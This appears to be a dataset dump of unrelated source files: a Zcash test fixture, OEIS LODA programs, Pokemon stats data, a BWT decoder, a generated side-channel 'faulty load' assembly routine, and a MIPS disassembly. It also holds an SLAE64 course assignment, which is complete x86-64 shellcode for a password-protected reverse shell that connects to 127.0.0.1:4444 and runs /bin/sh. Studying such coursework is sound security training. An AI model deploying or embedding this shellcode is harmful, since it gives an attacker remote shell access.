text stringlengths 1 1.05M |
|---|
// Copyright (c) 2011-2013 The Bitcoin Core developers
// Copyright (c) 2017-2018 The CruZeta developers
// Distributed under the MIT software license, see the accompanying
// file COPYING or http://www.opensource.org/licenses/mit-license.php.
#define BOOST_TEST_MODULE Bitcoin Test Suite
#include "test_bitcoin.h"
#include "crypto/common.h"
#include "key.h"
#include "main.h"
#include "random.h"
#include "txdb.h"
#include "txmempool.h"
#include "ui_interface.h"
#include "rpc/server.h"
#include "rpc/register.h"
#include "util.h"
#ifdef ENABLE_WALLET
#include "wallet/db.h"
#include "wallet/wallet.h"
#endif
#include <boost/filesystem.hpp>
#include <boost/test/unit_test.hpp>
#include <boost/thread.hpp>
#include "librustzcash.h"
CClientUIInterface uiInterface; // Declared but not defined in ui_interface.h
CWallet* pwalletMain;
ZCJoinSplit *pzcashParams;
std::unique_ptr<CConnman> g_connman;
extern bool fPrintToConsole;
extern void noui_connect();
// Test fixture setup for JoinSplit tests: prepares the Sprout
// proving/verifying keys and hands the Sapling/Groth16 parameter files
// to librustzcash.
JoinSplitTestingSetup::JoinSplitTestingSetup()
{
// Sprout keys are loaded from the standard Zcash params directory.
boost::filesystem::path pk_path = ZC_GetParamsDir() / "sprout-proving.key";
boost::filesystem::path vk_path = ZC_GetParamsDir() / "sprout-verifying.key";
// Sets the file-level global used by the tests; released in the destructor.
pzcashParams = ZCJoinSplit::Prepared(vk_path.string(), pk_path.string());
boost::filesystem::path sapling_spend = ZC_GetParamsDir() / "sapling-spend.params";
boost::filesystem::path sapling_output = ZC_GetParamsDir() / "sapling-output.params";
boost::filesystem::path sprout_groth16 = ZC_GetParamsDir() / "sprout-groth16.params";
// librustzcash consumes paths as arrays of `codeunit`; fail the build on any
// platform where the native path character width differs.
static_assert(
sizeof(boost::filesystem::path::value_type) == sizeof(codeunit),
"librustzcash not configured correctly");
// Keep the native strings alive across the C call below (c_str() pointers).
auto sapling_spend_str = sapling_spend.native();
auto sapling_output_str = sapling_output.native();
auto sprout_groth16_str = sprout_groth16.native();
// NOTE(review): the hex literals are presumably the expected SHA-512 digests
// of each parameter file, checked by librustzcash -- confirm against the
// librustzcash_init_zksnark_params API.
librustzcash_init_zksnark_params(
reinterpret_cast<const codeunit*>(sapling_spend_str.c_str()),
sapling_spend_str.length(),
"8270785a1a0d0bc77196f000ee6d221c9c9894f55307bd9357c3f0105d31ca63991ab91324160d8f53e2bbd3c2633a6eb8bdf5205d822e7f3f73edac51b2b70c",
reinterpret_cast<const codeunit*>(sapling_output_str.c_str()),
sapling_output_str.length(),
"657e3d38dbb5cb5e7dd2970e8b03d69b4787dd907285b5a7f0790dcc8072f60bf593b32cc2d1c030e00ff5ae64bf84c5c3beb84ddc841d48264b4a171744d028",
reinterpret_cast<const codeunit*>(sprout_groth16_str.c_str()),
sprout_groth16_str.length(),
"e9b238411bd6c0ec4791e9d04245ec350c9c5744f5610dfcce4365d5ca49dfefd5054e371842b3f88fa1b9d7e8e075249b3ebabd167fa8b0f3161292d36c180a"
);
}
// Fixture teardown: releases the Sprout parameters created in the ctor.
// NOTE(review): the global pzcashParams is left dangling (not nulled);
// acceptable as long as nothing touches it after teardown.
JoinSplitTestingSetup::~JoinSplitTestingSetup()
{
delete pzcashParams;
}
// Minimal per-test environment: crypto init, environment/network setup, and
// chain-param selection. Every test fixture in this file builds on this.
BasicTestingSetup::BasicTestingSetup()
{
// libsodium must initialize before any crypto is used; abort the run if not.
assert(init_and_check_sodium() != -1);
ECC_Start();
SetupEnvironment();
SetupNetworking();
fPrintToDebugLog = false; // don't want to write to debug.log file
// Enable the expensive block-index consistency checks in tests.
fCheckBlockIndex = true;
SelectParams(CBaseChainParams::MAIN);
}
// Reverses BasicTestingSetup: stops ECC and drops the global connection
// manager. NOTE(review): g_connman is created in TestingSetup but reset
// here in the base destructor -- intentional ordering inherited from
// upstream; confirm before changing.
BasicTestingSetup::~BasicTestingSetup()
{
ECC_Stop();
g_connman.reset();
}
// Full-node test fixture: RPC tables, a throwaway datadir, block/coins DBs,
// optional mock wallet, script-check threads, and a connection manager.
TestingSetup::TestingSetup()
{
const CChainParams& chainparams = Params();
// Ideally we'd move all the RPC tests to the functional testing framework
// instead of unit tests, but for now we need these here.
RegisterAllCoreRPCCommands(tableRPC);
#ifdef ENABLE_WALLET
// In-memory (mock) BDB environment so no wallet files touch disk.
bitdb.MakeMock();
RegisterWalletRPCCommands(tableRPC);
#endif
// Save current path, in case a test changes it
orig_current_path = boost::filesystem::current_path();
ClearDatadirCache();
// Unique temp datadir per test run (timestamp + random suffix).
pathTemp = GetTempPath() / strprintf("test_bitcoin_%lu_%i", (unsigned long)GetTime(), (int)(GetRand(100000)));
boost::filesystem::create_directories(pathTemp);
mapArgs["-datadir"] = pathTemp.string();
// Small in-memory DBs (second arg true); freed in the destructor.
pblocktree = new CBlockTreeDB(1 << 20, true);
pcoinsdbview = new CCoinsViewDB(1 << 23, true);
pcoinsTip = new CCoinsViewCache(pcoinsdbview);
InitBlockIndex(chainparams);
#ifdef ENABLE_WALLET
bool fFirstRun;
pwalletMain = new CWallet("wallet.dat");
pwalletMain->LoadWallet(fFirstRun);
// Wallet must observe validation events during the test.
RegisterValidationInterface(pwalletMain);
#endif
// Spawn N-1 worker threads; the caller thread acts as the Nth checker.
nScriptCheckThreads = 3;
for (int i=0; i < nScriptCheckThreads-1; i++)
threadGroup.create_thread(&ThreadScriptCheck);
g_connman = std::unique_ptr<CConnman>(new CConnman());
connman = g_connman.get();
RegisterNodeSignals(GetNodeSignals());
}
// Tears down TestingSetup in reverse order of construction: signals,
// threads, wallet, DBs, then the temp datadir.
TestingSetup::~TestingSetup()
{
UnregisterNodeSignals(GetNodeSignals());
// Stop the script-check worker threads before freeing shared state.
threadGroup.interrupt_all();
threadGroup.join_all();
#ifdef ENABLE_WALLET
UnregisterValidationInterface(pwalletMain);
delete pwalletMain;
pwalletMain = NULL;
#endif
UnloadBlockIndex();
// Coins cache before backing view before block tree (dependency order).
delete pcoinsTip;
delete pcoinsdbview;
delete pblocktree;
#ifdef ENABLE_WALLET
bitdb.Flush(true);
bitdb.Reset();
#endif
// Restore the previous current path so temporary directory can be deleted
boost::filesystem::current_path(orig_current_path);
boost::filesystem::remove_all(pathTemp);
}
// Builds a CTxMemPoolEntry from `tx` using the helper's stored member values
// (nFee, nTime, dPriority, ...). If `pool` is given, the "has no inputs of"
// flag is computed from the pool; otherwise the preset hadNoDependencies
// member is used.
CTxMemPoolEntry TestMemPoolEntryHelper::FromTx(CMutableTransaction &tx, CTxMemPool *pool) {
return CTxMemPoolEntry(tx, nFee, nTime, dPriority, nHeight,
pool ? pool->HasNoInputsOf(tx) : hadNoDependencies,
spendsCoinbase, nBranchId);
}
// Test stub for the node's Shutdown(): in the unit-test binary a shutdown
// request simply terminates the process. `parg` is unused.
void Shutdown(void* parg)
{
exit(0);
}
// Test stub: requesting shutdown exits immediately rather than running the
// real asynchronous shutdown sequence.
void StartShutdown()
{
exit(0);
}
// Test stub: the unit-test binary never reports a pending shutdown.
bool ShutdownRequested()
{
return false;
}
|
; A182619: Number of vertices that are connected to two edges in a spiral without holes constructed with n hexagons.
; Submitted by Jon Maiga
; 6,8,9,10,11,12,12,13,14,14,15,15,16,16,17,17,18,18,18,19,19,20,20,20,21,21,21,22,22,22,23,23,23,24,24,24,24
; LODA program: $0 is the input n and also carries the result.
; First map n to 3*(4n+2) = 12n+6.
mul $0,4
add $0,2
mul $0,3
; Repeatedly subtract the successive odd numbers 3,5,7,... from $0 while it
; stays positive ($1 holds the current odd number). NOTE(review): this is an
; integer-square-root-style reduction under LODA lpb/lpe loop semantics --
; verify against the LODA language reference before relying on this reading.
mov $1,3
lpb $0
sub $0,$1
add $1,2
lpe
; Map the final odd increment to the sequence value: ($1+1)/2 + 3.
mov $0,$1
add $0,1
div $0,2
add $0,3
|
; Base-stats table entry for Tentacool (species index 072).
; NOTE(review): field meanings are taken from the inline comments that ship
; with this generated table entry; confirm against the table's layout
; definition before editing any field.
db TENTACOOL ; 072
db 40, 40, 35, 70, 50, 100
; hp atk def spd sat sdf
db WATER, POISON ; type
db 190 ; catch rate
db 105 ; base exp
db NO_ITEM, NO_ITEM ; items
db GENDER_F50 ; gender ratio
db 100 ; unknown 1
db 20 ; step cycles to hatch
db 5 ; unknown 2
INCBIN "gfx/pokemon/tentacool/front.dimensions"
db 0, 0, 0, 0 ; padding
db GROWTH_SLOW ; growth rate
dn EGG_WATER_3, EGG_WATER_3 ; egg groups
; tm/hm learnset
tmhm CURSE, TOXIC, HIDDEN_POWER, SNORE, BLIZZARD, ICY_WIND, PROTECT, RAIN_DANCE, GIGA_DRAIN, ENDURE, FRUSTRATION, RETURN, DOUBLE_TEAM, SWAGGER, SLEEP_TALK, SLUDGE_BOMB, REST, ATTRACT, CUT, SURF, WHIRLPOOL, ICE_BEAM
; end
|
; A005442: a(n) = n!*Fibonacci(n+1).
; Submitted by Jamie Morken(s1)
; 1,1,4,18,120,960,9360,105840,1370880,19958400,322963200,5748019200,111607372800,2347586841600,53178757632000,1290674601216000,33413695451136000,919096314200064000,26768324463648768000,822929104265748480000,26630545381501501440000,904871676803145891840000,32210488855922903285760000,1198706312148618596843520000,46549141340036288937984000000,1882952320790078381555712000000,79213702211565625730138112000000,3460602488906906918565838848000000,156782428561337006771827900416000000
; LODA program: loops n times, folding the factorial factor and a
; Fibonacci-style two-term recurrence into $3 simultaneously.
; NOTE(review): register roles ($3 running result, $2 previous term,
; $1 scratch holding the current loop counter) are inferred from the
; instruction order -- verify against a few terms of the b-file.
mov $3,1
lpb $0
mov $2,$3
add $3,$1
mov $1,$0
sub $0,1
mul $3,$1
mul $1,$2
lpe
mov $0,$3
|
; A212976: Number of (w,x,y) with all terms in {0,...,n} and odd range.
; 0,6,12,36,60,114,168,264,360,510,660,876,1092,1386,1680,2064,2448,2934,3420,4020,4620,5346,6072,6936,7800,8814,9828,11004,12180,13530,14880,16416,17952,19686,21420,23364,25308,27474,29640,32040
; LODA program: two nested countdown loops ($14 outer over $12=n, $11 inner
; over $9) enumerate index pairs; the innermost lpb reduces each pair via
; mod/mul/trn into $1, which is accumulated into $10 and then $13.
; NOTE(review): the exact roles of $2/$8 and the trn (truncated subtraction)
; step are inferred from structure only -- verify against the listed terms
; before relying on this description.
mov $12,$0
mov $14,$0
lpb $14,1
clr $0,12
mov $0,$12
sub $14,1
sub $0,$14
mov $9,$0
mov $11,$0
lpb $11,1
mov $0,$9
sub $11,1
sub $0,$11
mov $2,$0
mov $8,$0
lpb $2,1
mod $2,2
mul $2,6
mul $8,$2
mov $1,$8
trn $2,$8
lpe
add $10,$1
lpe
add $13,$10
lpe
mov $1,$13
|
#include<bits/stdc++.h>
using namespace std;
typedef long long int ll;
typedef unsigned long long int ull;
typedef long double ld;
#define MOD 1000000007
#define INF 1000000000000000000
#define endll "\n"
#define pb push_back
#define forn(i,n) for(i=0;i<n;i++)
#define forab(i,a,b) for(i=a;i<=b;i++)
#define vpll vector<pair<ll,ll>>
#define pll pair<ll,ll>
#define vll vector<ll>
#define ff first
#define ss second
#define bs binary_search
#define lb lower_bound
#define ub upper_bound
#define test ll t;cin>>t; while(t--)
#define fast_io ios_base::sync_with_stdio(false);cin.tie(NULL);cout.tie(NULL);
// Reconstructs the original text from its Burrows-Wheeler transform `s`
// (the last column of the sorted-rotations matrix) and writes it to stdout.
//
// Stably sorting the (character, row) pairs of the last column yields the
// first column together with the LF-mapping: entry i of the sorted vector
// tells us which row of the last column precedes sorted row i. Starting at
// the lexicographically smallest rotation (row 0 of the sorted matrix) and
// repeatedly following the mapping emits the original string. This assumes
// the input was built from a string terminated by a unique smallest
// sentinel (e.g. '$'), so the smallest rotation starts the walk correctly.
//
// Fixes over the original: the string is taken by const reference instead
// of by value (no copy), and an empty input no longer indexes v[0] of an
// empty vector (previously undefined behavior).
void inverseBWT(const std::string &s)
{
    const std::size_t n = s.length();
    if (n == 0)
        return; // nothing to reconstruct
    // Pair each last-column character with its row index; std::pair's
    // lexicographic ordering makes std::sort effectively stable here,
    // because the second components (indices) are all distinct.
    std::vector<std::pair<char, std::size_t>> lf;
    lf.reserve(n);
    for (std::size_t i = 0; i < n; ++i)
        lf.push_back({s[i], i});
    std::sort(lf.begin(), lf.end());
    // Walk the LF-mapping starting from the smallest rotation.
    std::pair<char, std::size_t> cur = lf[0];
    for (std::size_t i = 0; i < n; ++i) {
        cur = lf[cur.second];
        std::cout << cur.first;
    }
}
int main()
{
fast_io;
string s;
cin>>s;
inverseBWT(s);
return 0;
}
|
// s_prepare_buffers: machine-generated buffer-warming routine (see the
// generator metadata comment block after s_faulty_load). Per that metadata
// it performs one 16-byte load from addresses_WT_ht, one 8-byte load from
// addresses_normal_ht, and one aligned 32-byte store to addresses_UC_ht.
// All clobbered general-purpose registers are saved/restored; the
// interleaved nops and flag-only ALU ops are generator padding.
.global s_prepare_buffers
s_prepare_buffers:
push %r10
push %r13
push %r15
push %r9
push %rbx
push %rdi
push %rsi
// 16-byte load from the write-through heating buffer; the line is flushed
// first so the access misses.
lea addresses_WT_ht+0x288f, %rdi
clflush (%rdi)
nop
nop
nop
nop
and $38612, %rsi
movups (%rdi), %xmm1
vpextrq $0, %xmm1, %r10
sub %rbx, %rbx
// 8-byte load from the normal heating buffer.
lea addresses_normal_ht+0xb26b, %r9
nop
nop
nop
nop
nop
cmp %rdi, %rdi
mov (%r9), %r13
nop
nop
nop
nop
nop
and %rbx, %rbx
// Aligned 32-byte store to the uncacheable heating buffer; the address is
// masked down to a 64-byte boundary so vmovaps does not fault.
lea addresses_UC_ht+0x7eb, %r10
nop
nop
add %r15, %r15
mov $0x6162636465666768, %rdi
movq %rdi, %xmm6
and $0xffffffffffffffc0, %r10
vmovaps %ymm6, (%r10)
add %rbx, %rbx
pop %rsi
pop %rdi
pop %rbx
pop %r9
pop %r15
pop %r13
pop %r10
ret
// s_faulty_load: machine-generated access sequence ending in the "faulty"
// load. Per the generator metadata in the trailing comment block, the final
// 2-byte load from addresses_D is the probed access, and its value selects
// a page in `oracles` -- NOTE(review): this looks like a transient-execution
// (Spectre/Meltdown-style) transmit gadget via the cache; inferred from the
// oracle indexing below, confirm against the harness.
.global s_faulty_load
s_faulty_load:
push %r12
push %r13
push %r15
push %r8
push %r9
push %rbp
push %rcx
push %rdi
push %rsi
// Load
lea addresses_UC+0xfe6b, %r12
nop
sub %r8, %r8
movups (%r12), %xmm3
vpextrq $0, %xmm3, %rcx
nop
cmp $14521, %rcx
// Store
lea addresses_UC+0x765b, %rbp
inc %r15
mov $0x5152535455565758, %r12
movq %r12, %xmm3
movups %xmm3, (%rbp)
xor %r9, %r9
// REPMOV
lea addresses_normal+0xeb35, %rsi
lea addresses_D+0x612b, %rdi
nop
inc %r8
// Copy 24 bytes from addresses_normal to addresses_D.
mov $24, %rcx
rep movsb
nop
nop
nop
nop
sub %r8, %r8
// Store
lea addresses_normal+0x1e0eb, %r15
clflush (%r15)
nop
nop
nop
nop
nop
xor %rdi, %rdi
mov $0x5152535455565758, %r13
movq %r13, %xmm4
// Aligned 32-byte AVX store (AVXalign per metadata).
vmovaps %ymm4, (%r15)
nop
nop
cmp $34237, %rsi
// Store
lea addresses_UC+0x10ab, %rsi
nop
nop
xor %r15, %r15
movl $0x51525354, (%rsi)
nop
nop
nop
nop
nop
xor %r15, %r15
// Store
lea addresses_WT+0x1c4cb, %rsi
clflush (%rsi)
nop
nop
nop
nop
nop
and $38853, %rbp
movl $0x51525354, (%rsi)
nop
nop
sub %rdi, %rdi
// Load
// 8-byte load through an absolute immediate pointer (the addresses_NC
// entry per the metadata below).
mov $0x6f3a60000000d6b, %rcx
add %rsi, %rsi
mov (%rcx), %r9
nop
nop
nop
nop
add %rdi, %rdi
// Load
lea addresses_UC+0x1fcb6, %rdi
clflush (%rdi)
nop
sub %r8, %r8
mov (%rdi), %ecx
nop
nop
nop
nop
nop
inc %rsi
// Faulty Load
// The probed access: 2-byte load from addresses_D into %r8w.
lea addresses_D+0x1016b, %r12
nop
nop
nop
and $43545, %r9
mov (%r12), %r8w
// Transmit: low byte of the loaded value, scaled by 4096 (one page per
// possible value), indexes the oracles array.
lea oracles, %rsi
and $0xff, %r8
shlq $12, %r8
mov (%rsi,%r8,1), %r8
pop %rsi
pop %rdi
pop %rcx
pop %rbp
pop %r9
pop %r8
pop %r15
pop %r13
pop %r12
ret
/*
<gen_faulty_load>
[REF]
{'src': {'NT': False, 'AVXalign': False, 'size': 4, 'congruent': 0, 'same': False, 'type': 'addresses_D'}, 'OP': 'LOAD'}
{'src': {'NT': False, 'AVXalign': False, 'size': 16, 'congruent': 6, 'same': False, 'type': 'addresses_UC'}, 'OP': 'LOAD'}
{'dst': {'NT': False, 'AVXalign': False, 'size': 16, 'congruent': 4, 'same': False, 'type': 'addresses_UC'}, 'OP': 'STOR'}
{'src': {'congruent': 1, 'same': False, 'type': 'addresses_normal'}, 'dst': {'congruent': 5, 'same': False, 'type': 'addresses_D'}, 'OP': 'REPM'}
{'dst': {'NT': False, 'AVXalign': True, 'size': 32, 'congruent': 7, 'same': False, 'type': 'addresses_normal'}, 'OP': 'STOR'}
{'dst': {'NT': False, 'AVXalign': False, 'size': 4, 'congruent': 6, 'same': False, 'type': 'addresses_UC'}, 'OP': 'STOR'}
{'dst': {'NT': False, 'AVXalign': False, 'size': 4, 'congruent': 5, 'same': False, 'type': 'addresses_WT'}, 'OP': 'STOR'}
{'src': {'NT': False, 'AVXalign': False, 'size': 8, 'congruent': 10, 'same': False, 'type': 'addresses_NC'}, 'OP': 'LOAD'}
{'src': {'NT': False, 'AVXalign': False, 'size': 4, 'congruent': 0, 'same': False, 'type': 'addresses_UC'}, 'OP': 'LOAD'}
[Faulty Load]
{'src': {'NT': True, 'AVXalign': False, 'size': 2, 'congruent': 0, 'same': True, 'type': 'addresses_D'}, 'OP': 'LOAD'}
<gen_prepare_buffer>
{'src': {'NT': False, 'AVXalign': False, 'size': 16, 'congruent': 1, 'same': False, 'type': 'addresses_WT_ht'}, 'OP': 'LOAD'}
{'src': {'NT': False, 'AVXalign': False, 'size': 8, 'congruent': 8, 'same': False, 'type': 'addresses_normal_ht'}, 'OP': 'LOAD'}
{'dst': {'NT': False, 'AVXalign': True, 'size': 32, 'congruent': 4, 'same': False, 'type': 'addresses_UC_ht'}, 'OP': 'STOR'}
{'36': 6}
36 36 36 36 36 36
*/
|
; SLAE64 assignment 2
; by Jasper Lievisse Adriaanse
; Student ID: SLAE64-1614
;
; Password-protected reverse-shell shellcode for Linux/x86_64:
; socket -> connect(127.0.0.1:4444) -> dup2 stdio onto the socket ->
; prompt for and verify a password -> execve /bin//sh on success.
global _start
%define SYS_WRITE 1
%define SYS_DUP2 33
%define SYS_SOCKET 41
%define SYS_EXECVE 59
%define SYS_CONNECT 42
section .text
_start:
; Start by opening a socket(2)
; syscall:
; socket: 41 on Linux/x86_64
; arguments:
; %rdi: AF_INET = 2
; %rsi: SOCK_STREAM = 1
; %rdx: 0
; returns:
; %rax: socket file descriptor
mov al, SYS_SOCKET
mov dil, 0x2
mov sil, 0x1
xor rdx, rdx
syscall
; The connect(2) syscall expects the socket fd to be in %rdi, so
; copy it there already.
mov rdi, rax
; Setup server struct sockaddr_in on the stack (in reverse order).
; Now, we need to take care to prevent a null byte from sneaking in when
; saving AF_INET. So clear the full 16 bytes we need (double %rax push)
; and build the stack on top of the zeroed area.
;
; Struct members (in reverse order):
; sin_zero: 0
; sin_addr.s_addr: 127.0.0.1
; sin_port: 4444 (in network byteorder)
; sin_family: AF_INET = 2
xor rax, rax
push rax ; sin_zero
; Since 127.0.0.1, written as 0x0100007f, contains two NULL bytes,
; we need a different way of representing this address. In this case we
; XOR it with a mask of ones before storing it on the stack.
mov r13d, 0x1011116e ; result of 0x0100007f ^ 0x11111111
xor r13d, 0x11111111
mov dword [rsp-4], r13d ; Finally store 0x0100007f just below the stack pointer
mov word [rsp-6], 0x5c11 ; port 4444 in network byte order
xor r13, r13 ; Clear %r13
mov r13b, 0x2 ; Write 0x2 to the lower 8 bits
mov word [rsp-8], r13w ; Move the lower 16 bits (including one NULL byte) to the stack
sub rsp, 8
; Invoke the connect(2) syscall to establish a connection to the configured
; remote (127.0.0.1) in this case.
; syscall:
; connect: 42 on Linux/x86_64
; arguments:
; %rdi: socket fd as returned by socket(2)
; %rsi: stack pointer (referencing struct sockaddr)
; %rdx: 16 (sizeof sockaddr)
; returns:
; %rax: 0 if succesful (ignored)
mov al, SYS_CONNECT
mov rsi, rsp
; %rdx is still 0 from the xor before socket(2) (the kernel clobbers only
; %rcx and %r11 across a syscall), so this yields exactly 16.
add rdx, 0x10
syscall
; Saves 8 bytes
; Now duplicate the required file descriptors for STDIN, STDOUT and STDERR with dup2(2).
; syscall:
; dup2: 33 on Linux/x86_64
; arguments:
; %rdi: socket fd
; %rsi: fd to duplicate
; returns:
; %rax: 0 if succesful (ignored)
xor rsi, rsi
xor rcx, rcx
mov cl, 0x2 ; upperlimit for our loop corresponding to STDERR (2)
; Now use a loop to increment the number in %rsi to match the file descriptor
; to operate on.
dup:
push rcx ; preserve the loop counter; the kernel clobbers %rcx
xor rax, rax
mov al, SYS_DUP2
syscall
inc rsi
pop rcx
loop dup
; Since we don't get a shell prompt, we might as well print a password prompt.
; syscall:
; write: 1 on Linux/x86_64
; arguments:
; %rdi: socket fd with the connecting client
; %rsi: pointer to a string on the stack
; %rdx: number of bytes to write
xor rax, rax
add al, SYS_WRITE
xor rsi, rsi
push rsi ; push terminating NULL to the stack
mov rsi, 0x203a64726f777373 ; "ssword: "
push rsi
mov rsi, 0x6170207265746e65 ; "enter pa"
push rsi
mov rsi, rsp ; load address to our prompt ('enter password: ') into %rsi
xor rdx, rdx
mov dl, 16 ; size of our prompt
syscall
; The password is 'taptap!!'
mov rbx, 0x2121706174706174
; Read the password provided on the socket fd with read(2)
; syscall:
; read: 0 on Linux/x86_64
; arguments:
; %rdi: saved socket fd
; %rsi: buffer (on the stack) to read data into
; %rdx: number of bytes to read
xor rax, rax
sub rsp, 8 ; allocate 8 bytes of storage on the stack
mov rsi, rsp
mov rdx, rax ; %rax is 0 here (SYS_READ), so %rdx = 0
add rdx, 8 ; ... + 8 = read at most 8 bytes
syscall
cmp rbx, [rsi] ; now perform a raw compare of the buffer pointed to by %rsi
jnz fail ; if the comparison didn't result in ZF being set, abort.
; Now we need to setup the stack for the execve(2) syscall and call it to
; execute our shell.
; syscall:
; execve: 59 on Linux/x86_64
; arguments:
; %rdi: pointer address of our /bin//sh string on the stack
; %rsi: idem
; %rdx: NULL
; returns:
; does not return here we terminate afterwards
; NOTE(review): the next instructions assume %r15 is zero, but nothing in
; this code ever clears it -- verify the process-entry guarantee holds in
; every injection context.
push r15 ; \0 to terminate our /bin//sh string
; Now push the string /bin//sh (in reverse) onto the stack
mov rax, 0x68732f2f6e69622f
push rax
mov rdi, rsp ; address to the string
push r15 ; NULL for %RDX
mov rdx, rsp ; point to the NULL
push rdi ; Put the address in %RDI on the stack
mov rsi, rsp ; and put it in %RSI whilst having %RSP adjusted
mov rax, r15 ; setup %RAX for execve() and off we go!
add al, SYS_EXECVE
syscall
; Wrong password: exit(1).
fail:
xor rax, rax
mov rdi, rax
mov al, 60 ; SYS_exit
mov dil, 1
syscall
|
user/mytest.b: file format elf32-tradbigmips
Disassembly of section .text:
00400000 <_start>:
400000: 8fa40000 lw a0,0(sp)
400004: 8fa50004 lw a1,4(sp)
400008: 0c1002f8 jal 400be0 <libmain>
40000c: 00000000 nop
400010: 00000000 nop
00400014 <__asm_pgfault_handler>:
400014: 00000000 nop
400018: 8fa4008c lw a0,140(sp)
40001c: 3c090040 lui t1,0x40
400020: 8d296010 lw t1,24592(t1)
400024: 0120f809 jalr t1
400028: 00000000 nop
40002c: 8fa30088 lw v1,136(sp)
400030: 00600013 mtlo v1
400034: 8fa20084 lw v0,132(sp)
400038: 8fa30094 lw v1,148(sp)
40003c: 00400011 mthi v0
400040: 40837000 mtc0 v1,$14
400044: 8fbf007c lw ra,124(sp)
400048: 8fbe0078 lw s8,120(sp)
40004c: 8fbc0070 lw gp,112(sp)
400050: 8fb90064 lw t9,100(sp)
400054: 8fb80060 lw t8,96(sp)
400058: 8fb7005c lw s7,92(sp)
40005c: 8fb60058 lw s6,88(sp)
400060: 8fb50054 lw s5,84(sp)
400064: 8fb40050 lw s4,80(sp)
400068: 8fb3004c lw s3,76(sp)
40006c: 8fb20048 lw s2,72(sp)
400070: 8fb10044 lw s1,68(sp)
400074: 8fb00040 lw s0,64(sp)
400078: 8faf003c lw t7,60(sp)
40007c: 8fae0038 lw t6,56(sp)
400080: 8fad0034 lw t5,52(sp)
400084: 8fac0030 lw t4,48(sp)
400088: 8fab002c lw t3,44(sp)
40008c: 8faa0028 lw t2,40(sp)
400090: 8fa90024 lw t1,36(sp)
400094: 8fa80020 lw t0,32(sp)
400098: 8fa7001c lw a3,28(sp)
40009c: 8fa60018 lw a2,24(sp)
4000a0: 8fa50014 lw a1,20(sp)
4000a4: 8fa40010 lw a0,16(sp)
4000a8: 8fa3000c lw v1,12(sp)
4000ac: 8fa20008 lw v0,8(sp)
4000b0: 8fa10004 lw at,4(sp)
4000b4: 8fba0094 lw k0,148(sp)
4000b8: 03400008 jr k0
4000bc: 8fbd0074 lw sp,116(sp)
004000c0 <msyscall>:
4000c0: 0000000c syscall
4000c4: 03e00008 jr ra
4000c8: 00000000 nop
4000cc: 00000000 nop
004000d0 <get_sp>:
4000d0: 03e00008 jr ra
4000d4: 03a01021 move v0,sp
...
004000e0 <umain>:
4000e0: 27bdffe8 addiu sp,sp,-24
4000e4: afbf0010 sw ra,16(sp)
4000e8: 0c1003ea jal 400fa8 <fork>
4000ec: 00000000 nop
4000f0: 14400017 bnez v0,400150 <umain+0x70>
4000f4: 3c020041 lui v0,0x41
4000f8: 0c100484 jal 401210 <tfork>
4000fc: 00000000 nop
400100: 1440000a bnez v0,40012c <umain+0x4c>
400104: 3c020041 lui v0,0x41
400108: 8c458000 lw a1,-32768(v0)
40010c: 00000000 nop
400110: 24a50003 addiu a1,a1,3
400114: ac458000 sw a1,-32768(v0)
400118: 3c040040 lui a0,0x40
40011c: 0c100086 jal 400218 <writef>
400120: 24847210 addiu a0,a0,29200
400124: 1000ffff b 400124 <umain+0x44>
400128: 00000000 nop
40012c: 8c458000 lw a1,-32768(v0)
400130: 00000000 nop
400134: 24a50002 addiu a1,a1,2
400138: ac458000 sw a1,-32768(v0)
40013c: 3c040040 lui a0,0x40
400140: 0c100086 jal 400218 <writef>
400144: 24847228 addiu a0,a0,29224
400148: 1000ffff b 400148 <umain+0x68>
40014c: 00000000 nop
400150: 8c458000 lw a1,-32768(v0)
400154: 00000000 nop
400158: 24a50001 addiu a1,a1,1
40015c: ac458000 sw a1,-32768(v0)
400160: 3c040040 lui a0,0x40
400164: 0c100086 jal 400218 <writef>
400168: 24847240 addiu a0,a0,29248
40016c: 1000ffff b 40016c <umain+0x8c>
400170: 00000000 nop
...
00400180 <user_myoutput>:
400180: 27bdffe0 addiu sp,sp,-32
400184: afbf001c sw ra,28(sp)
400188: afb20018 sw s2,24(sp)
40018c: afb10014 sw s1,20(sp)
400190: afb00010 sw s0,16(sp)
400194: 24020001 li v0,1
400198: 14c20015 bne a2,v0,4001f0 <user_myoutput+0x70>
40019c: 00c09021 move s2,a2
4001a0: 80a20000 lb v0,0(a1)
4001a4: 00000000 nop
4001a8: 14400013 bnez v0,4001f8 <user_myoutput+0x78>
4001ac: 00a08021 move s0,a1
4001b0: 10000013 b 400200 <user_myoutput+0x80>
4001b4: 00000000 nop
4001b8: 82040000 lb a0,0(s0)
4001bc: 0c10052c jal 4014b0 <syscall_putchar>
4001c0: 00000000 nop
4001c4: 82030000 lb v1,0(s0)
4001c8: 2402000a li v0,10
4001cc: 14620003 bne v1,v0,4001dc <user_myoutput+0x5c>
4001d0: 00000000 nop
4001d4: 0c10052c jal 4014b0 <syscall_putchar>
4001d8: 2404000a li a0,10
4001dc: 26310001 addiu s1,s1,1
4001e0: 12510007 beq s2,s1,400200 <user_myoutput+0x80>
4001e4: 26100001 addiu s0,s0,1
4001e8: 1000fff3 b 4001b8 <user_myoutput+0x38>
4001ec: 00000000 nop
4001f0: 18c00003 blez a2,400200 <user_myoutput+0x80>
4001f4: 00a08021 move s0,a1
4001f8: 1000ffef b 4001b8 <user_myoutput+0x38>
4001fc: 00008821 move s1,zero
400200: 8fbf001c lw ra,28(sp)
400204: 8fb20018 lw s2,24(sp)
400208: 8fb10014 lw s1,20(sp)
40020c: 8fb00010 lw s0,16(sp)
400210: 03e00008 jr ra
400214: 27bd0020 addiu sp,sp,32
00400218 <writef>:
400218: 27bdffe0 addiu sp,sp,-32
40021c: afbf0018 sw ra,24(sp)
400220: afa50024 sw a1,36(sp)
400224: afa60028 sw a2,40(sp)
400228: afa7002c sw a3,44(sp)
40022c: 00803021 move a2,a0
400230: 27a70024 addiu a3,sp,36
400234: afa70010 sw a3,16(sp)
400238: 3c040040 lui a0,0x40
40023c: 24840180 addiu a0,a0,384
400240: 0c1000b0 jal 4002c0 <user_lp_Print>
400244: 00002821 move a1,zero
400248: 8fbf0018 lw ra,24(sp)
40024c: 00000000 nop
400250: 03e00008 jr ra
400254: 27bd0020 addiu sp,sp,32
00400258 <_user_panic>:
400258: 27bdffe0 addiu sp,sp,-32
40025c: afbf001c sw ra,28(sp)
400260: afb00018 sw s0,24(sp)
400264: 00801821 move v1,a0
400268: 00a04021 move t0,a1
40026c: afa7002c sw a3,44(sp)
400270: 00c08021 move s0,a2
400274: 27a2002c addiu v0,sp,44
400278: afa20010 sw v0,16(sp)
40027c: 3c040040 lui a0,0x40
